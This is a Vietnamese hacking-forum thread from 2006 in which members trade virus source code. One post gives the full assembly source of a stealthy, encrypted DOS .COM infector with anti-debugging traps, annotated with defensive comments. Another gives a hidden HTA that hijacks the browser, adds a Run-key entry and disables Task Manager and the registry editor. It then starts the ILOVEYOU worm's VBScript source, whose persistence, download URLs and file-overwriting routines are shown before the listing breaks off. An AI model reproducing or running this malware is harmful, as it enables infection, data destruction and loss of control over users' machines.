[Question] Virus Coder |
10/07/2006 22:51:15 (+0700) | #1 | 5591 |
seven love
Member
|
0 |
|
|
Joined: 06/10/2004 18:08:22
Messages: 3
Offline
|
|
Lâu nay không động vào Virus tự nhiên hôm nay đọc thấy ngứa nghề quá. Có bạn nào có niềm đam mê virus giống tôi thì hãy lên tiếng nhé.
Thiên đàng dành cho Virus Coder: http://vx.netlux.org/
Chúc vui vẻ |
[Question] Virus Coder |
11/07/2006 06:59:46 (+0700) | #2 | 5744 |
trojon
Member
|
0 |
|
|
Joined: 29/06/2006 22:36:06
Messages: 47
Offline
|
|
Cám ơn bác đã share
bạn có mã nguồn virus viết bằng ASM xin share giúp |
[Question] Virus Coder |
12/07/2006 10:01:28 (+0700) | #3 | 6029 |
taianhlacontrai
Member
|
0 |
|
|
Joined: 30/06/2006 19:21:06
Messages: 53
Location: Tây nguyên
Offline
|
|
trojon wrote:
Cám ơn bác đã share
bạn có mã nguồn virus viết bằng ASM xin share giúp
Hết hiểu, trong đó đâu thiếu con viết bằng ASM; hình như bạn chưa vào site đó mà đã cảm ơn theo quán tính.
Virus for MS-DOS
Code:
; =======================================================================>
; 100% By MnemoniX - 1994
;
; This is a memory resident .COM infector which hides itself using
; directory stealth (11/12 and 4E/4F). To avoid setting heuristic
; flags in TBAV, it overwrites part of the decryption routine with
; garbage and adds instructions to repair it on the header of the
; program. Runs through TBAV flawlessly. Examine it in action and
; observe for yourself.
;
; This virus also includes debugger traps to thwart tracing.
; =======================================================================>
; -----------------------------------------------------------------------
; Review note (defensive reading of this listing):
;   * PING/PONG form the residency handshake: the resident handler answers
;     INT 21h with AX=30F4h by returning BX=0DEADh (see new_int_21 and
;     test_pass). AH=30h is the DOS "get version" call, so the probe looks
;     like an ordinary version query.
;   * ID ('%0') is the last word of the 22-byte header that this code
;     writes over the start of a .COM file, i.e. it sits at file offset 20
;     (MARKER). The infection routine itself tests for it before writing.
; -----------------------------------------------------------------------
PING equ 30F4h ; give INT 21 this value ...
PONG equ 0DEADh ; if this returns we're res.
ID equ '%0' ; ID marker
HEADER_SIZE equ 22 ; 22 - byte .COM header
MARKER equ 20 ; marker at offset 20
code segment byte public 'code'
org 100h ; .COM programs are loaded at offset 100h
assume cs:code
; First-generation carrier. The bytes from `start` up to `host` stand in for
; the header an already-infected file would carry (filler, a JMP to the
; appended body, then the ID word). `host` is the slot that holds the saved
; original first bytes of the host program; here it is INT 20h (CD 20,
; terminate) padded with NOPs, so running the carrier simply exits after the
; resident part has been set up.
start:
db 17 dup (90h) ; simulate infected program
jmp virus_begin ; a real host program will
dw ID ; have some MOVs at the
host:
db 0CDh,20h ; beginning
db 20 dup(90h)
; Decryptor stub. The two MOV opcodes are emitted as raw bytes so that their
; immediate operands carry labels (code_offset, cipher) which encrypt_code
; rewrites for every copy it produces. The loop is a word-wise XOR with a
; key that is rotated right by one bit after each word.
;
; Review note (defensive): the key differs per copy, so the encrypted body
; gives no stable byte signature. In copies written by this code the first
; four bytes at `decrypt` are also replaced by filler and only restored at
; run time by the 22-byte file header (see create_header / new_header), so
; matching has to be done on the header layout, not on this loop.
virus_begin:
db 0BBh ; mov bx,offset viral_code
code_offset dw offset virus_code
db 0B8h ; mov ax,cipher
cipher dw 0 ; key is 0 in this carrier, so the XOR below changes nothing
mov cx,VIRUS_SIZE / 2 + 1 ; mov cx,length of code
decrypt:
xor [bx],ax ; in real infections,
ror ax,1 ; portions of this code
inc bx ; will be replaced with
inc bx ; dummy bytes, which will be
loop decrypt ; fixed up by the header.
; this complicates scanning
; Main entry after decryption: find own load address, interfere with
; debugging, check whether a copy is already resident and, if not, carve a
; block off the top of conventional memory and hook INT 21h.
;
; Review note (defensive) - what this leaves behind on a running system:
;   * the memory size recorded for the program's block and its "top of
;     memory" field shrink by (MEM_SIZE + 15) / 16 + 1 paragraphs;
;   * a new last block ('Z') with owner word 0008h appears at the top of
;     memory;
;   * the INT 21h vector points into that block instead of into DOS.
; Comparing these against a clean boot is how the resident part is spotted;
; file sizes cannot be trusted while it is active (see dir_stealth_1/2).
virus_code:
call $+3 ; BP is instruction pointer
pop bp
sub bp,offset $-1 ; BP = difference between run-time and assembled offsets
xor ax,ax ; anti-trace ...
mov es,ax ; set interrupts 0-3 to point
mov di,ax ; to The Great Void in high
dec ax ; memory ...
mov cl,8 ; CX is 0 after the decrypt loop, so this makes CX = 8 words
rep movsw ; as listed: copies 8 words from DS:SI over 0000:0000, the INT 0-3 vectors
mov ax,PING ; test for residency
int 21h
cmp bx,PONG
je installed
in al,21h ; another anti-debugger
xor al,2 ; routine ... lock out
out 21h,al ; keyboard
xor al,2 ; second toggle puts the value read from port 21h back
out 21h,al
; assumes DS still holds the PSP segment here, as at .COM entry, so DS-1
; addresses the memory control block of the program - TODO confirm
mov ax,ds ; not resident - install
dec ax ; ourselves in memory
mov ds,ax
sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1 ; shrink the size word of that block
sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1 ; offset 12h from DS is offset 2 of the following segment
mov ax,ds:[12h]
mov ds,ax ; DS = segment where the new block header is written
sub ax,15
mov es,ax ; ES:100h is now the first byte after that 16-byte header
mov byte ptr ds:[0],'Z' ; block type byte
mov word ptr ds:[1],8 ; owner word
mov word ptr ds:[3],(MEM_SIZE + 15) / 16 ; block size in paragraphs
push cs ; now move virus into memory
pop ds
mov di,100h
mov cx,(offset virus_end - offset start) / 2
lea si,[bp + offset start]
rep movsw
xor ax,ax ; change interrupt 21 to point
mov ds,ax ; to ourselves
mov si,21h * 4 ; address of the INT 21h vector in the table at segment 0
mov di,offset old_int_21 ; (saving original int 21)
movsw
movsw
mov word ptr ds:[si - 2],0 ; anti-trace - temporarily
; kill int 21
mov ds:[si - 4],offset new_int_21 ; new vector offset
mov ds:[si - 2],es ; new vector segment = the resident copy
; Hand control back to the host: copy the HEADER_SIZE saved bytes at `host`
; back to offset 100h and return to 100h (the address was pushed from DI
; before the copy). From the user's point of view the program then runs
; normally, which is why the in-memory image of a running host looks clean
; while the file on disk is modified.
installed:
push cs ; restore segregs
push cs
pop ds
pop es
lea si,[bp + offset host] ; and restore original
mov di,100h ; bytes of program
push di ; return address for the RET below
mov cx,HEADER_SIZE
rep movsb
ret ; and we're done
; Interrupt 21 handler - trap file execute, search, open, read, and
; moves to the end of the file.
;
; int_21 is the helper used by the handler below to reach the ORIGINAL
; INT 21h handler: PUSHF followed by a far CALL through old_int_21 stands in
; for an INT instruction, so the request does not pass through new_int_21
; again.
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
; Resident INT 21h dispatcher. Only five request types are intercepted:
;   AX=30F4h        residency probe (answered in test_pass)
;   AX=4B00h        load-and-execute, routed to `execute`
;   AH=11h/12h      FCB directory search, routed to dir_stealth_1
;   AH=4Eh/4Fh      handle-based directory search, routed to dir_stealth_2
; Everything else falls into int_21_exit, a hand-encoded far JMP (opcode EAh
; followed by the saved vector) to the original handler.
;
; Review note (defensive): the probe is the same one the installer uses, so
; a value of 0DEADh in BX after INT 21h with AX=30F4h indicates that this
; handler is in the chain.
new_int_21:
cmp ax,30F4h ; residency test?
je test_pass ; yes ....
cmp ax,4B00h ; file execute?
jne stealth
jmp execute ; yes, infect ...
stealth:
cmp ah,11h ; directory stealth
je dir_stealth_1
cmp ah,12h
je dir_stealth_1
cmp ah,4Eh ; more directory stealth
je dir_stealth_2
cmp ah,4Fh
je dir_stealth_2
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0 ; operand of the far JMP: original INT 21h vector, filled in at install time
test_pass:
call int_21 ; get real DOS version
mov bx,PONG ; and give pass signal
iret
; Size hiding for FCB-style directory searches (AH=11h/12h). After the real
; search has run, the result in the disk transfer area is inspected and, for
; a .COM entry whose time stamp carries the marker, the reported size is
; reduced by VIRUS_SIZE + HEADER_SIZE.
;
; Review note (defensive): the marker is the seconds field of the file time
; (low five bits = 26, i.e. 52 seconds). While the handler is resident,
; directory listings under-report the size of marked files; sizes and
; checksums have to be taken after booting from known-clean media. Any
; unrelated .COM file that happens to carry a 52-second stamp is also
; reported too small.
dir_stealth_1:
call int_21 ; perform directory search
cmp al,-1 ; no more files?
jne check_file
iret ; no, skip it
check_file:
push ax bx es ; check file for infection
mov ah,2Fh ; ask for the current disk transfer area, returned in ES:BX
int 21h
cmp byte ptr es:[bx],-1 ; check for extended FCB
jne no_ext_FCB
add bx,7 ; skip the extended-FCB prefix
no_ext_FCB:
cmp word ptr es:[bx + 9],'OC' ; first two extension characters, stored low byte first ("CO")
jne fixed ; not .COM file, ignore
mov ax,word ptr es:[bx + 17h] ; file time word of the entry
and al,31 ; check seconds -
cmp al,26 ; if 52, infected
jne fixed
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE ; low word of reported size
sbb word ptr es:[bx + 1Fh],0 ; borrow into the high word
fixed:
pop es bx ax
iret
; Size hiding for handle-style directory searches (AH=4Eh/4Fh). Same idea as
; dir_stealth_1 but with the field offsets of the find-first/find-next
; result: time word at +16h, size at +1Ah. The routine returns with
; RETF 2, i.e. it discards the caller's saved flags and hands back its own
; carry state (set on "not found", cleared otherwise).
;
; Review note (defensive): as above, the under-reporting only exists while
; the handler is resident and keys on the 52-second time stamp.
dir_stealth_2:
call int_21 ; perform file search
jnc check_file_2 ; if found, proceed
retf 2 ; nope, leave
check_file_2:
push ax bx si es
mov ah,2Fh ; find DTA
int 21h
xor si,si ; verify that this is a .COM
find_ext:
cmp byte ptr es:[bx + si],'.' ; scan forward from the start of the DTA for a dot
je found_ext
inc si
jmp find_ext
found_ext:
cmp word ptr es:[bx + si + 1],'OC' ; two characters after the dot, stored low byte first ("CO")
jne fixed_2 ; if not .COM, skip
mov ax,word ptr es:[bx + 16h]
and al,31 ; check for infection marker
cmp al,26
jne fixed_2 ; not found, skip
sub word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE
sbb word ptr es:[bx + 1Ch],0
fixed_2:
pop es si bx ax ; done
clc
retf 2
; Handler for AX=4B00h (load and execute). The file about to be run is
; opened, checked, and - if it is a .COM file without the marker - modified
; before the original request is passed on through int_21_exit.
;
; Review note (defensive) - observable effects on a file processed here:
;   * length grows by VIRUS_SIZE + HEADER_SIZE;
;   * the first 22 bytes are replaced by the header built in new_header,
;     ending with the ID word at offset 20; the original 22 bytes are
;     appended to the end of the old file contents, followed by the body;
;   * date and time are restored from the values saved before writing,
;     except that the seconds field is forced to 26 (52 seconds), so a
;     "recently modified" search does not find the file;
;   * the file is opened read-only and the open mode is then changed inside
;     the DOS system file table entry, so a monitor that only looks at
;     open-for-write requests on executables sees nothing. Content hashes
;     taken from a clean boot are the dependable check.
execute:
push ax bx cx dx di ds es ; file execute ... check
; if uninfected .COM file,
mov ax,3D00h ; and if so, infect
call int_21
jnc read_header
jmp exec_exit ; can't open, leave
read_header:
xchg ax,bx
push bx ; save file handle
mov ax,1220h ; get system file table
int 2Fh ; entry
nop ; remove this if you don't
; mind scanning as [512] under
; SCAN ...
mov bl,es:[di] ; get number of the SFT
mov ax,1216h ; for this handle
int 2Fh ; ES:DI now points to SFT (the code below indexes ES:[DI + n])
pop bx
mov word ptr es:[di + 2],2 ; change open mode to R/W
push word ptr es:[di + 13] ; save file date
push word ptr es:[di + 15] ; and file time
mov ax,word ptr es:[di + 11h] ; low word of the file size from the table entry
cmp ax,62579 - VIRUS_SIZE ; too big?
je exec_close
cmp ax,22 ; too small?
jb exec_close
add ax,HEADER_SIZE - 3 ; calculate virus offset
push cs
pop ds
mov ds:virus_offset,ax
mov ah,3Fh ; read header of file
mov cx,HEADER_SIZE ; to check for infection
mov dx,offset read_buffer
call int_21
cmp word ptr ds:read_buffer,'ZM' ; "MZ" signature at the start of the file
je exec_close ; don't infect .EXE
cmp word ptr ds:read_buffer[MARKER],ID ; if infected
je exec_close ; already, skip it
mov ax,4202h ; move to end of file
call move_ptr_write
mov dx,offset read_buffer ; and save header
call int_21
call encrypt_code ; encrypt the virus code
call create_header ; and create unique header
mov ah,40h
mov cx,VIRUS_SIZE ; write virus code to file
mov dx,offset encrypt_buffer
int 21h
mov ax,4200h ; back to beginning of file
call move_ptr_write
mov dx,offset new_header ; write new header
call int_21
pop dx ; restore file date & time
pop cx
and cl,0E0h ; but with timestamp
or cl,26 ; seconds field = 26 -> the marker tested by the stealth routines
mov ax,5701h
int 21h
mov ah,3Eh ; close file
int 21h
exec_exit:
pop es ds di dx cx bx ax
jmp int_21_exit ; let the original handler perform the requested execute
; Helper: seek with CX:DX = 0 using the mode already in AX, then preload
; CX/AH for a HEADER_SIZE-byte write; the caller supplies DX and issues the
; call.
move_ptr_write:
cwd ; move file pointer
xor cx,cx
int 21h
mov cx,HEADER_SIZE ; and prepare for write
mov ah,40h ; to file
ret
; Bail-out path for files that are skipped: drop the two saved time-stamp
; words, close the handle and continue with the original request.
exec_close:
pop ax ax ; clean off stack
mov ah,3Eh ; and close
int 21h
jmp exec_exit
; Builds the copy that is written to disk, in encrypt_buffer:
;   1. take a new key from INT 1Ah, AH=0 (DX of the returned tick count) and
;      store it in the decryptor's `cipher` operand;
;   2. store the run-time address of the encrypted part in `code_offset`;
;   3. copy the decryptor stub unchanged;
;   4. XOR the rest word by word with the key, rotating the key right by one
;      bit per word (the inverse of the loop at `decrypt`).
;
; Review note (defensive): because the key comes from the timer, two copies
; share no encrypted bytes; only the stub and the file header have a fixed
; shape. The 16-bit rotating XOR offers no real protection for analysis -
; the key is stored in clear inside each copy.
encrypt_code proc near
push si es
push cs
pop es
xor ah,ah ; get random no.
int 1Ah ; and store in decryption
mov cipher,dx ; module
mov ax,ds:virus_offset
add ax,DECRYPTOR_SIZE + 103h
mov code_offset,ax
mov si,offset virus_begin ; first store header
mov di,offset encrypt_buffer
mov cx,DECRYPTOR_SIZE
rep movsb ; (unencryted)
mov cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code
encrypt:
lodsw ; simple encryption routine
xor ax,dx
ror dx,1
stosw
loop encrypt
pop es si
ret
encrypt_code endp
; Fills in the variable fields of new_header and damages the decryptor in
; the outgoing copy:
;   * mov_1 / mov_2 receive the run-time addresses of the two 2-byte
;     instructions at `decrypt`;
;   * mov_al / mov_ax receive timer-derived filler values;
;   * the four bytes at `decrypt` inside encrypt_buffer are overwritten with
;     two filler words derived from the same timer value;
;   * virus_offset is reduced by 17 to become the displacement operand of
;     the JMP at the end of the header.
;
; Review note (defensive): this is the "repair at run time" trick described
; in the banner comment. The consequence for detection is that the header
; keeps a constant opcode skeleton (see new_header) while only its operands
; vary, which makes the header the natural place to match.
create_header proc near
mov ax,ds:virus_offset ; fix up addresses in new
add ax,103h + (offset decrypt - offset virus_begin)
mov ds:mov_1,ax ; header
inc ax
inc ax
mov ds:mov_2,ax
xor ah,ah ; fill in useless MOVs
int 1Ah ; with random bytes
mov ds:mov_al,cl
mov ds:mov_ax,dx
push es cs
pop es
mov di,offset encrypt_buffer
add di,offset decrypt - offset virus_begin
mov ax,dx ; now fill decryption module
neg ax ; with some garbage
stosw
rol ax,1
stosw
pop es
sub word ptr ds:virus_offset,17 ; fix up JMP instruction
ret ; done
create_header endp
; Template of the 22-byte header written over the start of a .COM file.
; Opcode skeleton, with the variable operands marked "..":
;   C7 06 .. .. 31 07    store the word 0731h (bytes 31 07) at address mov_1
;   B0 ..                load AL with a filler byte
;   C7 06 .. .. D1 C8    store the word 0C8D1h (bytes D1 C8) at address mov_2
;   B8 .. ..             load AX with a filler word
;   E9 .. ..             near JMP to the appended body
;   '%0'                 ID word at offset 20
; The two stored words are the same byte pairs that create_header removes
; from the loop at `decrypt`.
;
; Review note (defensive): the fixed bytes above plus the ID word are the
; stable part of every copy produced by this listing. The `sig` string lies
; between virus_code and virus_end, i.e. inside the encrypted range, so it
; is not readable in a file on disk; it is readable in the resident copy.
new_header db 0C7h,06
mov_1 dw 00
db 31h,07 ; first MOV 6
db 0B0h
mov_al db 00 ; a nothing MOV AL, 2
db 0C7h,06
mov_2 dw 00
db 0D1h,0C8h ; second MOV 6
db 0B8h
mov_ax dw 00 ; a nothing MOV AX, 3
db 0E9h ; jump instruction 1
virus_offset dw 0 ; virus offset 2
dw ID ; ID marker 2
; total bytes = 22
sig db '[100%] By MnemoniX 1994',0
virus_end:
VIRUS_SIZE equ offset virus_end - offset virus_begin
; The two buffers below exist only in the resident copy's memory block; they
; are counted in MEM_SIZE but lie after virus_end, so they are not part of
; what is written to files.
read_buffer dw HEADER_SIZE dup (?) ; storage for orig header
encrypt_buffer dw VIRUS_SIZE dup (?) ; storage for encrypted virus
heap_end:
MEM_SIZE equ offset heap_end - offset start
DECRYPTOR_SIZE equ offset virus_code - offset virus_begin
ENCRYPTED_SIZE equ offset virus_end - offset virus_code
code ends
end start
[Question] Virus Coder |
13/07/2006 00:51:08 (+0700) | #4 | 6191 |
jackly
Member
|
0 |
|
|
Joined: 26/06/2006 20:17:52
Messages: 11
Location: CHV
Offline
|
|
thank verry cái mã nguồn em đó ! |
[Question] Virus Coder |
13/07/2006 04:03:50 (+0700) | #5 | 6233 |
taianhlacontrai
Member
|
0 |
|
|
Joined: 30/06/2006 19:21:06
Messages: 53
Location: Tây nguyên
Offline
|
|
để học mà chứ đâu phải để dùng nó |
[Question] Virus Coder |
14/07/2006 03:10:07 (+0700) | #6 | 6448 |
seven love
Member
|
0 |
|
|
Joined: 06/10/2004 18:08:22
Messages: 3
Offline
|
|
Đoạn Code Virus của bạn Share hơi "Diễm Xưa" rồi. Thời nay Virus đâu còn lây trên COM file và thường trú trong MS-DOS nữa. |
[Question] Virus Coder |
14/07/2006 03:39:44 (+0700) | #7 | 6455 |
seven love
Member
|
0 |
|
|
Joined: 06/10/2004 18:08:22
Messages: 3
Offline
|
|
Định viết một bài Tutorial về Virus trên Windows - dựa trên kinh nghiệm các user đã từng làm việc tại BKIS nhưng sợ Admin sẽ delete hết. Từ nay xin làm việc thiện không nghịch nữa. |
[Question] Virus Coder |
14/07/2006 05:54:40 (+0700) | #8 | 6487 |
|
thangham
Member
|
0 |
|
|
Joined: 12/07/2006 16:50:39
Messages: 1
Offline
|
|
cho em hoi làm thế nào để chương trình tự động gửi email cho mình (visual basic) |
[Question] Re: Virus Coder |
04/12/2006 08:51:26 (+0700) | #9 | 27779 |
abaanh
Member
|
0 |
|
|
Joined: 03/12/2006 20:24:29
Messages: 23
Offline
|
|
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members. |
[Question] Virus Coder |
04/12/2006 14:12:45 (+0700) | #10 | 27840 |
|
ChinhVn
Elite Member
|
0 |
|
|
Joined: 07/05/2003 12:06:21
Messages: 80
Offline
|
|
seven love wrote:
Định viết một bài Tutorial về Virus trên Windows - dựa trên kinh nghiệm các user đã từng làm việc tại BKIS nhưng sợ Admin sẽ delete hết. Từ nay xin làm việc thiện không nghịch nữa.
Bồ viết tut với mục đích để học tập và nghiên cứu thì không ai xóa bài đâu mà sợ. |
[Question] Re: Virus Coder |
04/12/2006 17:35:45 (+0700) | #11 | 27852 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
to abaanh: cảnh cáo 2 lần rồi đó. Lần thứ 3 thì khỏi log vào diễn đàn luôn.
Nên đọc kỹ lại nội quy diễn đàn và đặc biệt là quy định của box "Thảo luận virus, trojan..." trước khi tiếp tục sinh hoạt với diễn đàn. |
|
What bringing us together is stronger than what pulling us apart. |
[Question] Virus Coder |
12/12/2006 11:35:14 (+0700) | #12 | 29986 |
|
hack9x
Member
|
0 |
|
|
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
|
|
các bác ah em chả biét tí gì vè virus cho lắm em mmuoons hỏi có mã virus rùi thì viết vào đâu mở soạn thảo source ra có thể viết đựoc không em chỉ biết vài cái đơn giản tỷ như đoạn hta để thay đổi mặc định trang chủ của máy như <html>
<!-- Review note (defensive): this HTA runs minimised and off-screen and uses the
     Windows Script Host shell object to write per-user registry values. What it
     changes, all under HKCU: the Internet Explorer start/search page and typed-URL
     history, a Run entry that opens the browser on the same URL at logon, the
     DisableRegistryTools and DisableTaskMGR policy values, the window title, and
     several Yahoo Pager settings including "Save Password" and "Auto Login".
     For clean-up, the two Disable* policy values have to be reset first, because
     they block the registry editor and Task Manager that would otherwise be used
     to undo the rest. An HTA runs with the rights of the user who opens it, so the
     practical control is not opening .hta files from untrusted sources. -->
<HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no" showintaskbar="no">
<body onload="window.blur();">
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
' Errors are suppressed, so a failed write is silent.
on error resume next
' Move the window outside the visible desktop area.
window.moveTo -1000,-1000
' Browser start page, search page and typed-URL history.
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "about:blank"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\default_page_url", ""
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url1","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url2","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url3","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD"
' Per-user logon persistence (Run key) and the two policy values that
' disable the registry editor and Task Manager.
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IEXPLORE.EXE", "IEXPLORE.EXE http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMGR","1","REG_DWORD"
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", "(¯`·_º-¦- WEL_COME_TO_HACK9X -¦-º_·´¯)^^_^^CAC_BAN_CO_THE_TRUY_CAP_TRANG_WEB_CUA_MINH_THEO_DIA_CHI^^_^^(¯`·_º-¦- WwW.TEEN9X.ISMY.LV-|-WwW.DEMTAN.ISMY.LV -¦-º_·´¯) "
' Instant-messenger client settings.
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Games\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Launchcast\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Weather\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\View\YMSGR_Sport\content url","http://www.freewebs.com/quynhkheonline/index.htm"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\Save Password","1","REG_DWORD"
wsh.RegWrite "HKCU\Software\Yahoo\Pager\Auto Login","1","REG_DWORD"
window.close
</script>
hoặc một đoạn virus iloveyou như sau
IIIIIIIIIIIIIII
II I LOVE YOU I
IIIIIIIIIIIhkmI
Este es el codigo fuente (en VBS) del virus "I love you" que le cayo al mundo
el 4 de mayo del 2000,Infectando rapidamente a millones de usuarios al explotar
una falta de seguridad en Microsoft Outlook, y ganando la atencion de la prensa.
rem barok -loveletter(vbe)
rem by: spyder / email / @GRAMMERSoft Group /
Manila,Philippines
' Script start-up. Errors are suppressed globally, the script opens its own
' file (WScript.ScriptFullname) for reading and keeps the complete text in
' vbscopy; that text is what the later routines write into other files.
' NOTE(review): several lines of this listing are damaged by the forum's line
' wrapping (split string literals, stray spaces such as "d ow"); the listing
' is also cut off inside "sub html" and is therefore incomplete as posted.
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
' Entry routine: sets the Windows Script Host time-out value to 0 if it is
' 1 or more, resolves the Windows, System and Temp folders, copies the
' running script to three fixed file names and then calls the persistence,
' HTML, e-mail and drive-walking routines in that order.
' Review note (defensive): the three copy names below are the file
' indicators visible in this listing - MSKernel32.vbs and
' LOVE-LETTER-FOR-YOU.TXT.vbs in the System folder, Win32DLL.vbs in the
' Windows folder. The ".TXT.vbs" double extension relies on Explorer hiding
' known extensions; showing extensions and blocking script attachments at
' the mail gateway are the matching controls.
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
' Persistence and download set-up.
'   * Registers the two dropped copies under the machine-wide Run and
'     RunServices keys so they start with Windows.
'   * Reads the browser's download directory (falls back to c:\).
'   * When fileexist() returns 1 for WinFAT32.exe in the System folder, sets
'     the browser start page to one of four URLs, chosen at random, that all
'     end in WIN-BUGSFIX.exe. Note that fileexist() in this listing returns
'     0 when the file exists and 1 when it does not.
'   * When WIN-BUGSFIX.exe is present in the download directory
'     (fileexist = 0), registers it under Run and sets the start page to a
'     blank page.
' Review note (defensive): the value names MSKernel32, Win32DLL and
' WIN-BUGSFIX under Run/RunServices are the registry indicators to look
' for. The key paths in this listing contain stray spaces and line breaks
' ("Curr entVersion") from the forum formatting; do not copy them verbatim
' into detection rules.
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about :blank"
end if
end sub
' Walks every drive whose DriveType is 2 or 3 and hands its root to
' folderlist(). In the FileSystemObject model these two values are fixed
' and network drives, so mapped shares are reached as well as local disks.
' Review note (defensive): this is why write access to shared folders
' matters for containment - files on a share can be damaged from any one
' client that has it mapped.
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
' Processes every file in one folder, by extension:
'   vbs, vbe                     content replaced with the script text
'   js, jse, css, wsh, sct, hta  content replaced, file copied to
'                                <basename>.vbs, original deleted
'   jpg, jpeg                    content replaced, file copied to
'                                <name>.vbs, original deleted
'   mp3, mp2                     a new <name>.vbs is created next to the
'                                file and the original gets attribute
'                                value 2 added (hidden); its content is
'                                not touched
' If the folder contains one of the listed mIRC files, a script.ini is
' written there that sends LOVE-LETTER-FOR-YOU.HTM from the System folder
' to users joining a channel.
' Review note (defensive): everything except the mp3/mp2 case is data
' loss - the original content is overwritten before the file is removed,
' so recovery means restoring from backup. The hidden mp3/mp2 originals can
' be recovered by clearing the hidden attribute. An unexpected script.ini
' in a mIRC folder with the header lines below is a further indicator.
sub infectfiles(folderspec)
On Error Resume Next
